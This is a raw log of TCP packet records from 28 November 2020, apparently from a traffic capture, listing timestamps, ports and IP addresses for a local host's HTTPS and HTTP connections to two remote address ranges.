Nov 28, 2020 10:25:19.312922955 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.312943935 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.312969923 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.313026905 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.313693047 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.313724995 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.313746929 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.313771009 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.313797951 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.313822985 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.314439058 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.314459085 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.314476967 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.314495087 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.314511061 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.314528942 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.314769030 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.315399885 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.315418959 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.315433979 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.315449953 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.315464973 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.315484047 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.315526009 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.316435099 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.316466093 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.316512108 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.316534996 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.316556931 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.316581964 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.316632032 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.316637993 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.317398071 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.317446947 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.317471027 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.317491055 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.317516088 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.317527056 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.317552090 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.318355083 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.318392992 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.318417072 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.318439960 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.318448067 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.318463087 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.318510056 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.318542957 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.319307089 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.319336891 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.319358110 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.319380045 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.319401026 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.319425106 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.319506884 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.320296049 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.320328951 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.320352077 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.320374966 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.320394039 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.320447922 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.320476055 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.321255922 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.321285963 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.321309090 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.321331978 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.321356058 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.321369886 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.321398020 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.322206974 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.322236061 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.322257996 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.322280884 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.322304010 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.322329998 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.322352886 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.322360992 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.323189020 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.323216915 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.323240042 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.323291063 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.323729992 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.323820114 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.323872089 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.323903084 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.323925972 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.323949099 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.323961973 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.323997974 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.324692965 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.324829102 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.324855089 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.324878931 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.324892044 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.324902058 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.324959040 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.325690985 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.325721979 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.325743914 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.325763941 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.325767040 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.325792074 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.325823069 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.325876951 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.326687098 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.326719046 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.326745987 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.326769114 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.326791048 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.326801062 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.326838017 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.327575922 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.327605963 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.327627897 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.327652931 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.327677965 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.327680111 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.327706099 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.327723026 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.328485012 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.328512907 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.328535080 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.328562021 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.328572989 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.328588009 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.328598976 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.329420090 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.329452038 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.329477072 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.329500914 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.329509974 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.329521894 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.329526901 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.329576969 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.330324888 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.330358982 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.330383062 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.330405951 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.330430031 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.330466032 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.330487967 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.331221104 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.331250906 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.331274986 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.331299067 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.331317902 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.331326008 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.331332922 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.331413984 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.332133055 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.332163095 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.332185984 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.332207918 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.332221031 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.332233906 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.332266092 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.333151102 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.333218098 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.333226919 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.333257914 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.333313942 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.333318949 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.333403111 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.333456993 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.333961010 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.333993912 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.334016085 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.334042072 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.334403992 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.334460974 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.334484100 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.334505081 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.334506989 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.334530115 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.334532022 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.335289001 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.335319042 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.335340977 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.335361004 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.335386992 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.335412025 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.335434914 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.336163044 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.336194992 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.336216927 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.336241007 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.336255074 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.336263895 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.336288929 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.336335897 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.337002039 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337030888 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337054014 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337075949 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337097883 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.337100983 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337132931 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.337846994 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337877989 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337903023 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337924004 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.337925911 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.337951899 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.337951899 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.338000059 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.338639975 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.338673115 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.338696957 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.338720083 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.338743925 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.338748932 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.338773012 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.339503050 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.339531898 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.339555025 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.339576006 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.339589119 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.339597940 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.339631081 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.339651108 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.340301991 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.340332985 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.340351105 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.340367079 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.340385914 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.340405941 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.340439081 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.341101885 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.341123104 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.341141939 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.341164112 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.341166019 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.341187000 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.341198921 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.341208935 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.341255903 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.342067003 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.342092991 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.342114925 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.342133045 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.342152119 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.342168093 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.342169046 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.342190027 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.342200994 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.342962980 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.342983007 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.342993021 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.343038082 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.343060017 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:32.101660013 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:33.873356104 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:25:40.308598042 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:26:00.699213982 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:00.861423969 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:00.861597061 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:00.861838102 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:00.861941099 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:00.865660906 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.023885012 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.027195930 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.029577971 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.032037020 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.064941883 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.155482054 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.155525923 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.155551910 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.155574083 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.155646086 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.155680895 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.155715942 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.193769932 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.193804026 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.193820953 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.193834066 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.193900108 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.193974972 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.204116106 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.204149008 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.204216003 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.204348087 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.255434036 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.255460978 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.255530119 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.257209063 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.279953003 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.279988050 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.280047894 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.280076981 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.280229092 CET	80	49757	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.280276060 CET	49757	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.355767012 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.355797052 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.355812073 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.355827093 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.355843067 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.355859995 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.355931044 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.356028080 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.517718077 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.517738104 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.517750978 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.517764091 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.517836094 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.517932892 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.518086910 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.518102884 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.518173933 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.518275976 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.518285990 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.518409967 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.679477930 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.679497957 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.679510117 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.679677963 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.680520058 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.680572987 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.680680037 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.841490030 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.841504097 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.841511965 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.842257023 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.842351913 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.957648993 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.957678080 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.957695007 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.957707882 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.957766056 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.957813025 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.984627962 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.984657049 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:01.984740019 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:01.984765053 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:02.036562920 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:02.036585093 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:02.036634922 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:02.036669016 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:02.053273916 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:02.053294897 CET	80	49758	198.20.71.158	192.168.2.6
Nov 28, 2020 10:26:02.053442001 CET	49758	80	192.168.2.6	198.20.71.158
Nov 28, 2020 10:26:02.053464890 CET	49758	80	192.168.2.6	198.20.71.158
